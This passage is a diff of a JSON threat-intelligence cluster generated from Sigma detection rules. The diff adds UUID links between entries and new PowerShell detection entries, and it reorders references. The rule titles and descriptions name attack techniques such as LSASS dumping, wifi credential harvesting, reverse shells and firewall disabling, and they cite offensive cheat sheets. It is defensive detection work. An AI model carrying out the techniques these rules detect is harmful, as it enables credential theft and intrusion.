@@ -37631,6 +48167,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "value": "Renamed MegaSync" }, @@ -37687,6 +48232,29 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", "value": "Baby Shark Activity" }, @@ -37736,6 +48304,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a70042a-6622-4a2b-8958-267625349abf", "value": "Run from a Zip File" }, @@ -37761,6 +48338,15 @@ "attack.t1546.011" ] }, + "related": [ + { + "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", "value": "Possible Shim Database Persistence via sdbinst.exe" }, 
@@ -37777,9 +48363,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.php.net/manual/en/features.commandline.php", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.revshells.com/", - "https://www.php.net/manual/en/features.commandline.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ @@ -37787,6 +48373,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "value": "Php Inline Command Execution" }, @@ -37837,6 +48432,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", "value": "Rar Usage with Password and Compression Level" }, @@ -37862,6 +48466,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50919691-7302-437f-8e10-1fe088afa145", "value": "Regsvr32 Command Line Without DLL" }, @@ -37887,6 +48500,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", "value": "Blue Mockingbird" }, 
@@ -37906,8 +48528,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" ], "tags": [ @@ -37940,6 +48562,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "value": "Suspicious Regsvr32 Execution From Remote Share" }, @@ -37956,8 +48587,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/klinix5/InstallerFileTakeOver", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" ], "tags": [ @@ -37965,6 +48596,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" }, @@ -37992,6 +48632,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "value": "Suspicious Add User to Remote Desktop Users Group" }, 
@@ -38008,8 +48657,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" ], "tags": [ @@ -38040,6 +48689,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "value": "PowerShell Download from URL" }, @@ -38103,8 +48761,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1182389676876980224", "https://twitter.com/cglyer/status/1182391019633029120", + "https://twitter.com/cglyer/status/1182389676876980224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" ], "tags": [ @@ -38112,6 +48770,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "value": "WMI Backdoor Exchange Transport Agent" }, @@ -38190,6 +48857,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", "value": "Shells Spawned by Web Servers" }, 
@@ -38206,14 +48882,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ 
@@ -38223,6 +48899,22 @@
 "attack.t1218.013"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66",
 "value": "Mavinject Inject DLL Into Running Process"
 },
@@ -38247,6 +48939,15 @@
 "attack.t1218.007"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c",
 "value": "Suspicious Msiexec Quiet Install From Remote Location"
 },
@@ -38271,6 +48972,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e",
 "value": "Proxy Execution Via Explorer.exe"
 },
@@ -38295,6 +49005,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d",
 "value": "CreateMiniDump Hacktool"
 },
@@ -38335,12 +49054,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
 "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
 "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
 "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml"
 ],
 "tags": [
@@ -38365,8 +49084,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/med0x2e/status/1520402518685200384",
 "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
+ "https://twitter.com/med0x2e/status/1520402518685200384",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml"
 ],
 "tags": [
@@ -38375,6 +49094,15 @@
 "attack.t1212"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bb76d96b-821c-47cf-944b-7ce377864492",
 "value": "Suspicious NTLM Authentication on the Printer Spooler Service"
 },
@@ -38425,6 +49153,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9f107a84-532c-41af-b005-8d12a607639f",
 "value": "Cabinet File Expansion"
 },
@@ -38449,6 +49186,15 @@
 "attack.t1489"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1",
 "value": "Delete All Scheduled Tasks"
 },
@@ -38498,6 +49244,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79",
 "value": "TropicTrooper Campaign November 2018"
 },
@@ -38514,9 +49269,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp",
 "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml",
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml"
 ],
 "tags": [
@@ -38524,6 +49279,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1",
 "value": "Suspicious Mofcomp Execution"
 },
@@ -38565,8 +49329,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
 "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
 "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml"
 ],
@@ -38576,6 +49340,15 @@
 "attack.s0108"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3",
 "value": "Firewall Disabled via Netsh"
 },
@@ -38600,6 +49373,15 @@
 "attack.t1216"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d",
 "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl"
 },
@@ -38626,6 +49408,15 @@
 "attack.t1218.009"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2",
 "value": "Regasm/Regsvcs Suspicious Execution"
 },
@@ -38653,6 +49444,15 @@
 "attack.t1185"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449",
 "value": "Browser Started with Remote Debugging"
 },
@@ -38669,8 +49469,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md",
 "https://www.pdq.com/pdq-deploy/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml"
 ],
 "tags": [
@@ -38682,6 +49482,28 @@
 "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450",
 "value": "Use of PDQ Deploy Remote Adminstartion Tool"
 },
+ {
+ "description": "Detects suspicious PowerShell invocation command parameters",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_powershell_invocation_specific.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "536e2947-3729-478c-9903-745aaffe60d2",
+ "value": "Suspicious PowerShell Invocations - Specific - ProcessCreation"
+ },
 {
 "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report",
 "meta": {
@@ -38720,9 +49542,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
 "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
- "https://attack.mitre.org/techniques/T1036/",
+ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml"
 ],
 "tags": [
@@ -38730,6 +49551,15 @@
 "attack.t1036.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e",
 "value": "Highly Relevant Renamed Binary"
 },
@@ -38746,8 +49576,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml"
 ],
 "tags": [
@@ -38755,9 +49585,51 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2",
 "value": "Modification of Boot Configuration"
 },
+ {
+ "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/05/24",
+ "falsepositive": [
+ "Other tools that work with encoded scripts in the command line instead of script files"
+ ],
+ "filename": "proc_creation_win_susp_powershell_encoded_cmd_patterns.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c",
+ "value": "Suspicious PowerShell Encoded Command Patterns"
+ },
 {
 "description": "Detect the harvesting of wifi credentials using netsh.exe",
 "meta": {
@@ -38804,6 +49676,15 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb",
 "value": "Schtasks From Suspicious Folders"
 },
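Review bot: The description of the newly added `Suspicious PowerShell Encoded Command Patterns` entry carries the typo `combincation` (for `combination`) from the upstream Sigma rule text. Since this cluster is generated from the rule files, the fix belongs in the upstream rule's `description` followed by a regeneration; a hand edit here would be overwritten on the next run. The entry's `related` block reuses the same `dest-uuid` as the other `attack.t1059.001` rules in this chunk, which is consistent with how the rest of the commit maps technique tags.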
@@ -38829,6 +49710,15 @@
 "attack.t1552.006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86",
 "value": "Suspicious SYSVOL Domain Group Policy Access"
 },
@@ -38855,6 +49745,15 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "81325ce1-be01-4250-944f-b4789644556f",
 "value": "Suspicious Schtasks From Env Var Folder"
 },
@@ -38871,8 +49770,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
 "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml"
 ],
 "tags": [
@@ -38896,8 +49795,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml"
 ],
 "tags": [
@@ -38929,6 +49828,15 @@
 "attack.t1218.010"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0",
 "value": "Regsvr32 Flags Anomaly"
 },
@@ -38945,9 +49853,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
 "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
 ],
 "tags": [
@@ -38997,8 +49905,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/",
 "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml"
 ],
 "tags": [
@@ -39031,6 +49939,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0",
 "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines"
 },
@@ -39047,9 +49964,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml"
 ],
 "tags": [
@@ -39057,6 +49974,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e",
 "value": "LSASS Memory Dumping"
 },
@@ -39081,6 +50007,15 @@
 "attack.t1562.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0a13e132-651d-11eb-ae93-0242ac130002",
 "value": "Suspicious Auditpol Usage"
 },
@@ -39106,6 +50041,15 @@
 "attack.t1564.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "efec536f-72e8-4656-8960-5e85d091345b",
 "value": "Set Suspicious Files as System Files Using Attrib"
 },
@@ -39130,6 +50074,15 @@
 "attack.t1548"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "883835a7-df45-43e4-bf1d-4268768afda4",
 "value": "Regedit as Trusted Installer"
 },
@@ -39146,8 +50099,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securelist.com/schroedingers-petya/78870/",
 "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100",
+ "https://securelist.com/schroedingers-petya/78870/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml"
 ],
 "tags": [
@@ -39159,6 +50112,29 @@
 "car.2016-04-002"
 ]
 },
+ "related": [
+ {
